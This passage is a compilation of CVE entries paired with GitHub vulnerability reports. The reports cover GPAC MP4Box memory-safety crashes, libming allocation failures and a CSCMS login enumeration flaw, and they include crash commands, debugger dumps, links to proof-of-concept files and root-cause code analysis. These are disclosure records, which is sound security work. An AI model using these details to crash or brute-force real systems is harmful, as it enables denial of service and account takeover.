/root/fuck_bin/gpac/test/lib/libgpac.so.10 #9 0x00005555555844a8 in dump_isom_scene () #10 0x000055555557b42c in mp4boxMain () #11 0x00007ffff75630b3 in __libc_start_main (main=0x55555556c420 <main>, argc=3, argv=0x7fffffffe1c8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe1b8) at ../csu/libc-start.c:308 #12 0x000055555556c45e in _start () ```

Null Pointer Dereference in lsr_read_anim_values_ex()

https://api.github.com/repos/gpac/gpac/issues/1985/comments

2021-12-14T02:40:51Z

2021-12-14T10:36:54Z

https://github.com/gpac/gpac/issues/1985

CVE-2021-45267

2021-12-22T18:15:08.257

An invalid memory address dereference vulnerability exists in gpac 1.1.0 via the svg_node_start function, which causes a segmentation fault and application crash.

https://github.com/gpac/gpac/issues/1965

github.com

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ An invalid memory address dereference was discovered in svg_node_start(). The vulnerability causes a segmentation fault and application crash. **Version:** ``` MP4Box - GPAC version 1.1.0-DEV-revUNKNOWN_REV (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D ``` **System information** Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz **command:** ``` ./MP4Box -lsr poc_2.xsr ``` [poc_2.zip](https://github.com/gpac/gpac/files/7692197/poc_2.zip) **Result** ``` [Parser] LASeR Scene Parsing: ./poc/poc_2.xsr [1] 75845 segmentation fault ./MP4Box -lsr ./poc/poc_2.xsr ``` **gdb** ``` Program received signal SIGSEGV, Segmentation fault. 0x00007ffff7aa5f97 in svg_node_start () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ────────────────────────────────────────────[ REGISTERS ]───────────────────────────────────────────── RAX 0x0 RBX 0x5555555c7750 ◂— 0x0 RCX 0x0 RDX 0x5555555ce2b0 —▸ 0x5555555ce0e3 ◂— 0x7572742200706172 /* 'rap' */ RDI 0x7ffff7e447c9 ◂— 'Unable to parse chunk: %s' RSI 0x5555555ce0e3 ◂— 0x7572742200706172 /* 'rap' */ R8 0x7fffffff5c3c ◂— 0x0 R9 0x5555555ce0e3 ◂— 0x7572742200706172 /* 'rap' */ R10 0x0 R11 0x0 R12 0x5555555ce2b0 —▸ 0x5555555ce0e3 ◂— 0x7572742200706172 /* 'rap' */ R13 0x5555555ce0d5 ◂— 0x6e65637300666173 /* 'saf' */ R14 0x1 R15 0x0 RBP 0x5555555cf390 —▸ 0x7fffffff7310 ◂— 0x7 RSP 0x7fffffff5bb0 ◂— 0x0 RIP 0x7ffff7aa5f97 (svg_node_start+3095) ◂— mov rdi, qword ptr [rax + 0x20] ──────────────────────────────────────────────[ DISASM ]────────────────────────────────────────────── ► 0x7ffff7aa5f97 <svg_node_start+3095> mov rdi, qword ptr [rax + 0x20] 0x7ffff7aa5f9b <svg_node_start+3099> call gf_list_count@plt <gf_list_count@plt> 0x7ffff7aa5fa0 <svg_node_start+3104> test eax, eax 0x7ffff7aa5fa2 <svg_node_start+3106> sete r15b 0x7ffff7aa5fa6 <svg_node_start+3110> test r14d, r14d 0x7ffff7aa5fa9 <svg_node_start+3113> jne svg_node_start+6240 <svg_node_start+6240> 0x7ffff7aa5faf <svg_node_start+3119> xor esi, esi 0x7ffff7aa5fb1 <svg_node_start+3121> nop dword ptr [rax] 0x7ffff7aa5fb8 <svg_node_start+3128> mov rdi, qword ptr [rbp + 0x50] 0x7ffff7aa5fbc <svg_node_start+3132> mov edx, r15d 0x7ffff7aa5fbf <svg_node_start+3135> pxor xmm0, xmm0 ──────────────────────────────────────────────[ STACK ]─────────────────────────────────────────────── 00:0000│ rsp 0x7fffffff5bb0 ◂— 0x0 01:0008│ 0x7fffffff5bb8 —▸ 0x5555555ce0d9 ◂— 'sceneUnit' 02:0010│ 0x7fffffff5bc0 ◂— 0x0 03:0018│ 0x7fffffff5bc8 ◂— 0x0 04:0020│ 0x7fffffff5bd0 —▸ 0x5555555ce0d5 ◂— 0x6e65637300666173 /* 'saf' */ 05:0028│ 0x7fffffff5bd8 ◂— 0x0 06:0030│ 0x7fffffff5be0 ◂— 0x0 07:0038│ 0x7fffffff5be8 ◂— 0x3000000020 /* ' ' */ ────────────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────────── ► f 0 0x7ffff7aa5f97 svg_node_start+3095 f 1 0x7ffff781fbc5 xml_sax_node_start+453 f 2 0x7ffff7820e6c xml_sax_parse+3596 f 3 0x7ffff78213d6 gf_xml_sax_parse_intern+950 f 4 0x7ffff7821595 gf_xml_sax_parse+165 f 5 0x7ffff7821633 xml_sax_read_file.part+115 f 6 0x7ffff7821927 gf_xml_sax_parse_file+295 f 7 0x7ffff7aa42da load_svg_run+58 ────────────────────────────────────────────────────────────────────────────────────────────────────── pwndbg> bt #0 0x00007ffff7aa5f97 in svg_node_start () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #1 0x00007ffff781fbc5 in xml_sax_node_start () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #2 0x00007ffff7820e6c in xml_sax_parse () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #3 0x00007ffff78213d6 in gf_xml_sax_parse_intern () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #4 0x00007ffff7821595 in gf_xml_sax_parse () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #5 0x00007ffff7821633 in xml_sax_read_file.part () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #6 0x00007ffff7821927 in gf_xml_sax_parse_file () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #7 0x00007ffff7aa42da in load_svg_run () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #8 0x00005555555844a8 in dump_isom_scene () #9 0x000055555557b42c in mp4boxMain () #10 0x00007ffff75630b3 in __libc_start_main (main=0x55555556c420 <main>, argc=3, argv=0x7fffffffe188, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe178) at ../csu/libc-start.c:308 #11 0x000055555556c45e in _start () ```

Invalid memory address dereference in svg_node_start()

https://api.github.com/repos/gpac/gpac/issues/1965/comments

2021-12-10T10:59:40Z

2021-12-13T13:22:06Z

https://github.com/gpac/gpac/issues/1965

CVE-2020-21238

2021-12-27T23:15:08.080

An issue in the user login box of CSCMS v4.0 allows attackers to hijack user accounts via brute force attacks.

https://github.com/chshcms/cscms/issues/5

github.com

cscmsV4.0-4.1 demourl:http://demo.chshcms.com/ In the user login box Sign in now without a verification code and prompt that the user does not exist，which makes it easier for remote attackers to hijack accounts via a brute-force approach. Capture the packet in burp to truncate the current request the current data packet sent to the intruder module, identification "username" used to traverse account information; Select the dictionary for the account name to open the attack  Successful login account  This is a prompt password error  This is the prompt that the account does not exist. 

cscms demourl:http://demo.chshcms.com/ login have UserTraversal-Vulnerability

https://api.github.com/repos/chshcms/cscms/issues/5/comments

2019-11-15T01:15:46Z

2019-11-15T01:15:46Z

https://github.com/chshcms/cscms/issues/5

CVE-2021-45831

2022-01-05T20:15:07.950

A Null Pointer Dereference vulnerability exitgs in GPAC 1.0.1 in MP4Box via __strlen_avx2, which causes a Denial of Service.

https://github.com/gpac/gpac/issues/1990

github.com

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [Yes ] I looked for a similar issue and couldn't find any. - [ Yes] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [ Yes] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ **Version:** ``` ./MP4Box -version MP4Box - GPAC version 1.1.0-DEV-rev1527-g6fcf9819e-master (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io MINI build (encoders, decoders, audio and video output disabled) Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --static-mp4box --prefix=/home/zxq/CVE_testing/sourceproject/gpac/cmakebuild --enable-debug Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_FREETYPE GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_DISABLE_3D ``` **System information** Ubuntu 20.04.1 LTS, gcc version 9.3.0 (Ubuntu 9.3.0-17ubuntu1~20.04) **command:** ``` ./bin/gcc/MP4Box -bt POC1 ``` [POC1.zip](https://github.com/gpac/gpac/files/7711140/POC1.zip) **Result** ``` [5] 2204206 segmentation fault ./sourceproject/momey/gpac/bin/gcc/MP4Box -bt ``` **Gdb information** ``` Stopped reason: SIGSEGV __strlen_avx2 () at ../sysdeps/x86_64/multiarch/strlen-avx2.S:65 65 ../sysdeps/x86_64/multiarch/strlen-avx2.S: No such file or directory. gdb-peda$ bt #0 __strlen_avx2 () at ../sysdeps/x86_64/multiarch/strlen-avx2.S:65 #1 0x00007ffff755a503 in __GI___strdup (s=0x0) at strdup.c:41 #2 0x00007ffff7851545 in gf_svg_dump_attribute () from /home/zxq/CVE_testing/sourceproject/momey/gpac/bin/gcc/libgpac.so.10 #3 0x00007ffff7a497e2 in gf_dump_svg_element () from /home/zxq/CVE_testing/sourceproject/momey/gpac/bin/gcc/libgpac.so.10 #4 0x00007ffff7a4a9b0 in gf_sm_dump_command_list () from /home/zxq/CVE_testing/sourceproject/momey/gpac/bin/gcc/libgpac.so.10 #5 0x00007ffff7a5173d in gf_sm_dump () from /home/zxq/CVE_testing/sourceproject/momey/gpac/bin/gcc/libgpac.so.10 #6 0x0000555555585418 in dump_isom_scene () #7 0x000055555557c42c in mp4boxMain () #8 0x00007ffff74df0b3 in __libc_start_main (main=0x55555556d420 <main>, argc=0x3, argv=0x7fffffffe248, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe238) at ../csu/libc-start.c:308 #9 0x000055555556d45e in _start () ```

Null Pointer Dereference in __strlen_avx2 ()

https://api.github.com/repos/gpac/gpac/issues/1990/comments

2021-12-14T11:19:27Z

2021-12-15T08:50:11Z

https://github.com/gpac/gpac/issues/1990

CVE-2021-46038

2022-01-05T23:15:08.947

A Pointer Dereference vulnerability exists in GPAC 1.0.1 in unlink_chunk.isra, which causes a Denial of Service (context-dependent).

https://github.com/gpac/gpac/issues/2000

github.com

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [Yes ] I looked for a similar issue and couldn't find any. - [ Yes] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [ Yes] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ **Version:** ``` ./MP4Box -version ``` **command:** ``` ./bin/gcc/MP4Box -hint POC2 ``` [POC2.zip](https://github.com/gpac/gpac/files/7763677/POC2.zip) **Result** ``` segmentation fault ``` **bt** ``` Program received signal SIGSEGV, Segmentation fault. 0x00007ffff754da2f in unlink_chunk (p=p@entry=0x5555555e1480, av=0x7ffff76a0b80 <main_arena>) at malloc.c:1453 1453 malloc.c: No such file or directory. LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA [ REGISTERS ] RAX 0x14000007a0 RBX 0x7ffff76a0b80 (main_arena) ◂— 0x0 RCX 0x14000007a5 RDX 0x7ffff76a10b0 (main_arena+1328) —▸ 0x7ffff76a10a0 (main_arena+1312) —▸ 0x7ffff76a1090 (main_arena+1296) —▸ 0x7ffff76a1080 (main_arena+1280) —▸ 0x7ffff76a1070 (main_arena+1264) ◂— ... RDI 0x5555555e1480 ◂— 0x8013f76a1f74 RSI 0x4000 R8 0x7ffff76a0c10 (main_arena+144) —▸ 0x7ffff76a0c00 (main_arena+128) —▸ 0x5555555e0f10 ◂— 0x1400000014 R9 0x0 R10 0x7ffff7e0e94e ◂— ' but no data reference entry found\n' R11 0x7ffff76a0be0 (main_arena+96) —▸ 0x5555555e69e0 ◂— 0x0 R12 0x1400000760 R13 0x40 R14 0x14000007a0 R15 0x2 RBP 0x38 RSP 0x7fffffff7e30 —▸ 0x5555555e2a00 ◂— 0x1473746383 RIP 0x7ffff754da2f (unlink_chunk.isra+15) ◂— cmp rax, qword ptr [rdi + rax] [ DISASM ] ► 0x7ffff754da2f <unlink_chunk.isra+15> cmp rax, qword ptr [rdi + rax] 0x7ffff754da33 <unlink_chunk.isra+19> jne unlink_chunk.isra+191 <unlink_chunk.isra+191> ↓ 0x7ffff754dadf <unlink_chunk.isra+191> lea rdi, [rip + 0x11f954] 0x7ffff754dae6 <unlink_chunk.isra+198> call malloc_printerr <malloc_printerr> 0x7ffff754daeb <unlink_chunk.isra+203> lea rdi, [rip + 0x123756] 0x7ffff754daf2 <unlink_chunk.isra+210> call malloc_printerr <malloc_printerr> 0x7ffff754daf7 nop word ptr [rax + rax] 0x7ffff754db00 <malloc_consolidate> push r15 0x7ffff754db02 <malloc_consolidate+2> lea rax, [rdi + 0x60] 0x7ffff754db06 <malloc_consolidate+6> mov r15, rdi 0x7ffff754db09 <malloc_consolidate+9> push r14 [ STACK ] 00:0000│ rsp 0x7fffffff7e30 —▸ 0x5555555e2a00 ◂— 0x1473746383 01:0008│ 0x7fffffff7e38 —▸ 0x7ffff7550773 (_int_malloc+2947) ◂— cmp r12, 0x1f 02:0010│ 0x7fffffff7e40 —▸ 0x5555555e1480 ◂— 0x8013f76a1f74 03:0018│ 0x7fffffff7e48 —▸ 0x7ffff76a0be0 (main_arena+96) —▸ 0x5555555e69e0 ◂— 0x0 04:0020│ 0x7fffffff7e50 —▸ 0x7fffffff7e60 ◂— 0x38 /* '8' */ 05:0028│ 0x7fffffff7e58 ◂— 0xdab84f8dc31ec400 06:0030│ 0x7fffffff7e60 ◂— 0x38 /* '8' */ 07:0038│ 0x7fffffff7e68 ◂— 0x4 [ BACKTRACE ] ► f 0 0x7ffff754da2f unlink_chunk.isra+15 f 1 0x7ffff7550773 _int_malloc+2947 f 2 0x7ffff75522d4 malloc+116 f 3 0x7ffff78c17d2 co64_box_new+18 f 4 0x7ffff78f8aa9 gf_isom_box_new+153 f 5 0x7ffff791009c shift_chunk_offsets.part+284 f 6 0x7ffff79103a7 inplace_shift_moov_meta_offsets+231 f 7 0x7ffff7910e3c inplace_shift_mdat+732 ```

untrusted pointer dereference in unlink_chunk.isra

https://api.github.com/repos/gpac/gpac/issues/2000/comments

2021-12-22T15:49:42Z

2022-01-03T11:23:08Z

https://github.com/gpac/gpac/issues/2000

CVE-2021-44590

2022-01-06T14:15:07.867

In libming 0.4.8, a memory exhaustion vulnerability exist in the function cws2fws in util/main.c. Remote attackers could launch denial of service attacks by submitting a crafted SWF file that exploits this vulnerability.

https://github.com/libming/libming/issues/236

github.com

version: master(commit 04aee52 ) command: listswf $FILE ``` root:/path_to_libming/build/bin# ./listswf poc ==21798==WARNING: AddressSanitizer failed to allocate 0xffffffffb4b4b4b4 bytes ==21798==AddressSanitizer's allocator is terminating the process instead of returning 0 ==21798==If you don't like this behavior set allocator_may_return_null=1 ==21798==AddressSanitizer CHECK failed: /mnt/d/CLib/llvm-6.0.1/projects/compiler-rt/lib/sanitizer_common/sanitizer_allocator.cc:225 "((0)) != (0)" (0x0, 0x0) #0 0x4e3385 in __asan::AsanCheckFailed(char const*, int, char const*, unsigned long long, unsigned long long) /mnt/d/CLib/llvm-6.0.1/projects/compiler-rt/lib/asan/asan_rtl.cc:69 #1 0x500c45 in __sanitizer::CheckFailed(char const*, int, char const*, unsigned long long, unsigned long long) /mnt/d/CLib/llvm-6.0.1/projects/compiler-rt/lib/sanitizer_common/sanitizer_termination.cc:79 #2 0x4e9786 in __sanitizer::ReportAllocatorCannotReturnNull() /mnt/d/CLib/llvm-6.0.1/projects/compiler-rt/lib/sanitizer_common/sanitizer_allocator.cc:225 #3 0x4e97c6 in __sanitizer::ReturnNullOrDieOnFailure::OnBadRequest() /mnt/d/CLib/llvm-6.0.1/projects/compiler-rt/lib/sanitizer_common/sanitizer_allocator.cc:241 #4 0x41fadf in __asan::asan_realloc(void*, unsigned long, __sanitizer::BufferedStackTrace*) /mnt/d/CLib/llvm-6.0.1/projects/compiler-rt/lib/asan/asan_allocator.cc:865 #5 0x4da689 in realloc /mnt/d/CLib/llvm-6.0.1/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:108 #6 0x53815f in cws2fws /path_to_libming/util/main.c:111:15 #7 0x53aacb in readMovieHeader /path_to_libming/util/main.c:198:18 #8 0x539dc3 in main /path_to_libming/util/main.c:350:5 #9 0x7f88a92b5bf6 in __libc_start_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310 #10 0x41a2f9 in _start (/path_to_libming/build/bin/listswf+0x41a2f9) ``` A large integer passed to realloc, causing the allocation failure. The detailed call chain analysis is as follows. Download [poc](https://github.com/dandanxu96/PoC/blob/7cbf5b7f7b62e4a95725a226b29cae362b425ec8/libming/cws2fws-realloc-failure-poc) ```C static int readMovieHeader(FILE *f, int *compressed) { char first; struct stat stat_buf; first = readUInt8 (f); *compressed = (first == ('C')) ? 1 : 0; if (!((first == 'C' || first == 'F') && readUInt8 (f) == 'W' && readUInt8 (f) == 'S')) { SWF_error ("Doesn't look like a swf file to me..\n"); } m.version = readUInt8 (f); m.size = readUInt32 (f); // Read 32 bits from the input file, the m.size is controllable by the attacker m.soundStreamFmt = -1; m.fonts = NULL; m.numFonts = 0; if (*compressed) { #if USE_ZLIB int unzipped = cws2fws (f, m.size); ...... } ...... } int cws2fws(FILE *f, uLong outsize) { struct stat statbuffer; int insize, ret; int err,tmp_fd; Byte *inbuffer,*outbuffer; sprintf(tmp_name, "/tmp/swftoscriptXXXXXX"); #ifdef HAVE_MKSTEMP tmp_fd = mkstemp(tmp_name); #endif #ifndef HAVE_MKSTEMP tmp_fd = open(tmp_name, O_RDWR | O_CREAT | O_TRUNC , 0600); #endif if ( tmp_fd == -1 ) { SWF_error("Couldn't create tempfile.\n"); } tempfile = fdopen(tmp_fd, "w+"); if ( ! tempfile ) { SWF_error("fdopen: %s", strerror(errno)); } if( stat(filename, &statbuffer) == -1 ) { SWF_error("stat() failed on input file"); } insize = statbuffer.st_size-8; inbuffer = malloc(insize); if(!inbuffer){ SWF_error("malloc() failed"); } if ( ! fread(inbuffer, insize, 1, f) ) { SWF_error("Error reading input file"); } outbuffer=NULL; do{ outbuffer = realloc(outbuffer, outsize); // outsize is controlled by the attacker, and it is directly passed to realloc without any boundary check, resulting in allocation failure ...... }while(err == Z_BUF_ERROR); ...... } ```

Memory allocation failure in cws2fws

https://api.github.com/repos/libming/libming/issues/236/comments

2021-12-01T06:02:37Z

2021-12-01T06:02:37Z

https://github.com/libming/libming/issues/236

CVE-2021-44591

2022-01-06T14:15:07.917

In libming 0.4.8, the parseSWF_DEFINELOSSLESS2 function in util/parser.c lacks a boundary check that would lead to denial-of-service attacks via a crafted SWF file.

https://github.com/libming/libming/issues/235

github.com

version: master(commit [04aee52](https://github.com/libming/libming/commit/04aee52363688426eab74f5d6180c149654a6473) ) command: listswf $FILE ``` root:/path_to_libming/build/bin# ./listswf poc ==26225==WARNING: AddressSanitizer failed to allocate 0xfffffffffffffff9 bytes ==26225==AddressSanitizer's allocator is terminating the process instead of returning 0 ==26225==If you don't like this behavior set allocator_may_return_null=1 ==26225==AddressSanitizer CHECK failed: /mnt/d/CLib/llvm-6.0.1/projects/compiler-rt/lib/sanitizer_common/sanitizer_allocator.cc:225 "((0)) != (0)" (0x0, 0x0) #0 0x4e3385 in __asan::AsanCheckFailed(char const*, int, char const*, unsigned long long, unsigned long long) /mnt/d/CLib/llvm-6.0.1/projects/compiler-rt/lib/asan/asan_rtl.cc:69 #1 0x500c45 in __sanitizer::CheckFailed(char const*, int, char const*, unsigned long long, unsigned long long) /mnt/d/CLib/llvm-6.0.1/projects/compiler-rt/lib/sanitizer_common/sanitizer_termination.cc:79 #2 0x4e9786 in __sanitizer::ReportAllocatorCannotReturnNull() /mnt/d/CLib/llvm-6.0.1/projects/compiler-rt/lib/sanitizer_common/sanitizer_allocator.cc:225 #3 0x4e97c6 in __sanitizer::ReturnNullOrDieOnFailure::OnBadRequest() /mnt/d/CLib/llvm-6.0.1/projects/compiler-rt/lib/sanitizer_common/sanitizer_allocator.cc:241 #4 0x41f676 in __asan::asan_malloc(unsigned long, __sanitizer::BufferedStackTrace*) /mnt/d/CLib/llvm-6.0.1/projects/compiler-rt/lib/asan/asan_allocator.cc:856 #5 0x4da20b in malloc /mnt/d/CLib/llvm-6.0.1/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:89 #6 0x5b7e7e in readBytes /path_to_libming/util/read.c:252:17 #7 0x59b963 in parseSWF_DEFINELOSSLESS2 /path_to_libming/util/parser.c:2168:38 #8 0x546cf9 in blockParse /path_to_libming/util/blocktypes.c:145:14 #9 0x53bc13 in readMovie /path_to_libming/util/main.c:269:11 #10 0x53a0d6 in main /path_to_libming/util/main.c:354:2 #11 0x7fce52d93bf6 in __libc_start_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310 #12 0x41a2f9 in _start (/path_to_libming/build/bin/listswf+0x41a2f9) ``` The cause of this bug is the lack of boundary checks. Specifically, in the `parseSWF_DEFINELOSSLESS2` function, the size of `end` and `fileOffset` is not compared when `readBytes` is called. As a result, `end-fileOffset` may be a negative integer, which eventually leads to allocation failure. The detailed call chain analysis is as follows. Download [poc](https://github.com/dandanxu96/PoC/blob/7cbf5b7f7b62e4a95725a226b29cae362b425ec8/libming/parseSWF_DEFINELOSSLESS2-readBytes-malloc-failure-poc) ```C static void readMovie(FILE *f) { int block, type, length, nextFrame=0; SWF_Parserstruct *blockp; for (;;) { if(filelen_check_fails(2)) break; // Read 16 bits from the input file, the block is controlled by the attacker block = readUInt16 (f); type = block >> 6; // length = block & 0x3f, which means length<=3f length = block & ((1 << 6) - 1); if (length == 63) /* it's a long block. */ { if(filelen_check_fails(4)) break; unsigned long real_length = readUInt32 (f); if (real_length > INT_MAX) { SWF_warn(" Could not process long block with length %lu:" " blocks with length > %d not supported on this system\n", real_length, INT_MAX); continue; } else { length = (int) real_length; } } nextFrame = fileOffset+length; if(filelen_check_fails(length)) break; blockp= blockParse(f, length, type); ...... } ...... } SWF_Parserstruct * blockParse (FILE *f, int length, SWFBlocktype header) { int i; for (i = 0; i < numBlocks; i++) { // Select the corresponding parser to parse if (blocks[i].type == header) { return blocks[i].parser(f,length); } } return parseSWF_UNKNOWNBLOCK(f, length); } SWF_Parserstruct * parseSWF_DEFINELOSSLESS2 (FILE * f, int length) { int end = fileOffset + length; PAR_BEGIN (SWF_DEFINELOSSLESS2); parserrec->CharacterID = readUInt16 (f); // Read 16 bits from the input file, and fileOffset = fileOffset+2 parserrec->BitmapFormat = readUInt8 (f); // Read 8 bits from the input file, and fileOffset = fileOffset+1 parserrec->BitmapWidth = readUInt16 (f); // Read 16 bits from the input file, and fileOffset = fileOffset+2 parserrec->BitmapHeight = readUInt16 (f); Read 16 bits from the input file, and fileOffset = fileOffset+2 if( parserrec->BitmapFormat == 3 /* 8-bit */ ) { parserrec->BitmapColorTableSize = readUInt8 (f); } // When length=0, at this moment end=Old_fileOffset, fileOffset=Old_fileOffset+7, then end-fileOffset will be equal to -7 which is a negative integer parserrec->ZlibBitmapData = (UI8 *)readBytes (f,end-fileOffset); PAR_END; } char *readBytes(FILE *f, unsigned long size) { if (size < 1) { #if DEBUG SWF_warn("readBytes: want to read %lu < 1 bytes: Handling a 0\n", size); #endif size = 0; } unsigned long i; char *buf; // The parameter size's type is unsigned long. Given a negative integer as input, it will be treated as a large unsigned integer and passed to malloc, causing allocation failures. buf = (char *)malloc(sizeof(char)*size); if (buf == NULL) { fprintf(stderr, "readBytes: Failed to allocate %lu bytes", sizeof(char) * size); exit(-1); } for(i=0;i<size;i++) { buf[i]=(char)readUInt8(f); } return buf; } ```

Memory allocation failure caused by the missing boundary check in parseSWF_DEFINELOSSLESS2

https://api.github.com/repos/libming/libming/issues/235/comments

2021-12-01T05:31:44Z

2021-12-01T05:31:44Z

https://github.com/libming/libming/issues/235

CVE-2021-46039

2022-01-06T20:15:08.657

A Pointer Dereference Vulnerabilty exists in GPAC 1.0.1 via the shift_chunk_offsets.part function, which causes a Denial of Service (context-dependent).

https://github.com/gpac/gpac/issues/1999

github.com

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [Yes ] I looked for a similar issue and couldn't find any. - [ Yes] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [ Yes] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ **Version:** ``` ./MP4Box -version MP4Box - GPAC version 1.1.0-DEV-rev1574-g8b22f0912-master (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB ``` **command:** ``` ./bin/gcc/MP4Box -hint POC ``` [POC.zip](https://github.com/gpac/gpac/files/7762718/POC.zip) **Result** ``` Segmentation fault. ``` **bt** ``` Program received signal SIGSEGV, Segmentation fault. 0x0000000000544b81 in shift_chunk_offsets.part () LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA RAX 0x6054 RBX 0x6054 RCX 0x0 RDX 0xf23eb0 ◂— 0xcc3900003712 RDI 0xffffffff RSI 0xf3c000 R8 0x0 R9 0x7fffffff7f00 —▸ 0xf22fd0 ◂— 0x6d646961 /* 'aidm' */ R10 0xdda2e0 (_nl_C_LC_CTYPE_toupper+512) ◂— 0x100000000 R11 0x246 R12 0x14 R13 0xffff7f00 R14 0xf9000016 R15 0xf1e710 ◂— 0x7374636f /* 'octs' */ RBP 0x0 RSP 0x7fffffff7f00 —▸ 0xf22fd0 ◂— 0x6d646961 /* 'aidm' */ RIP 0x544b81 (shift_chunk_offsets.part+257) ◂— mov eax, dword ptr [rsi] ► 0x544b81 <shift_chunk_offsets.part+257> mov eax, dword ptr [rsi] 0x544b83 <shift_chunk_offsets.part+259> mov rdx, rax 0x544b86 <shift_chunk_offsets.part+262> add rax, r12 0x544b89 <shift_chunk_offsets.part+265> cmp rax, rdi 0x544b8c <shift_chunk_offsets.part+268> jbe shift_chunk_offsets.part+488 <shift_chunk_offsets.part+488> ↓ 0x544c68 <shift_chunk_offsets.part+488> add edx, r12d 0x544c6b <shift_chunk_offsets.part+491> xor ebp, ebp 0x544c6d <shift_chunk_offsets.part+493> mov dword ptr [rsi], edx 0x544c6f <shift_chunk_offsets.part+495> jmp shift_chunk_offsets.part+402 <shift_chunk_offsets.part+402> ↓ 0x544c12 <shift_chunk_offsets.part+402> add ebx, 1 0x544c15 <shift_chunk_offsets.part+405> cmp r14d, ebx 00:0000│ r9 rsp 0x7fffffff7f00 —▸ 0xf22fd0 ◂— 0x6d646961 /* 'aidm' */ 01:0008│ 0x7fffffff7f08 —▸ 0xf23e50 ◂— 0x73747363 /* 'csts' */ 02:0010│ 0x7fffffff7f10 ◂— 0x0 03:0018│ 0x7fffffff7f18 —▸ 0x7fffffff7f60 ◂— 0x0 04:0020│ 0x7fffffff7f20 ◂— 0x2 05:0028│ 0x7fffffff7f28 —▸ 0xf233b0 ◂— 0x7374626c /* 'lbts' */ 06:0030│ 0x7fffffff7f30 ◂— 0x0 07:0038│ 0x7fffffff7f38 —▸ 0xf1d6e0 ◂— 0x0 ► f 0 0x544b81 shift_chunk_offsets.part+257 f 1 0x544ea7 inplace_shift_moov_meta_offsets+231 f 2 0x54593c inplace_shift_mdat+732 f 3 0x549b09 WriteToFile+2713 f 4 0x53af32 gf_isom_write+370 f 5 